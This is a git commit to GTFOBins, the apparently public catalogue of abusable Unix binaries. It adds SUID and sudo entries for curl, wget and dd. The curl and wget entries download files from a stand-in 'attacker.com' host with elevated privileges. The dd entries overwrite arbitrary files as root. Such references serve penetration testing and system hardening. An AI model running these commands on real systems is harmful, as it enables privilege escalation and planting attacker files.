Add suid-enabled and sudo-enabled to curl, dd, and wget

2024-11-08 07:49:17 +01:00 · 2018-07-22 14:30:03 +01:00 · 2018-07-22 14:30:03 +01:00 · b016b7b9dd
commit b016b7b9dd
parent 00a06edb07
3 changed files with 32 additions and 0 deletions
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@ -17,4 +17,16 @@ functions:
      code: |
        LFILE=/tmp/file_to_read
        curl file://$LFILE
+  suid-enabled:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        URL=http://attacker.com/file_to_get
+        LFILE=file_to_save
+        ./curl $URL -o $LFILE
+  sudo-enabled:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        URL=http://attacker.com/file_to_get
+        LFILE=file_to_save
+        sudo -E curl $URL -o $LFILE
 ---
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@ -8,4 +8,12 @@ functions:
    - code: |
        LFILE=file_to_read
        dd if=LFILE
+  suid-enabled:
+    - code: |
+        LFILE=file_to_write
+        echo "data" | ./dd of=$LFILE
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_write
+        echo "data" | sudo -E dd of=$LFILE
 ---
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@ -12,4 +12,16 @@ functions:
        export URL=http://attacker.com/file_to_get
        export LFILE=file_to_save
        wget $URL -O $LFILE
+  suid-enabled:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        export URL=http://attacker.com/file_to_get
+        export LFILE=file_to_save
+        ./wget $URL -O $LFILE
+  sudo-enabled:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        export URL=http://attacker.com/file_to_get
+        export LFILE=file_to_save
+        sudo -E wget $URL -O $LFILE
 ---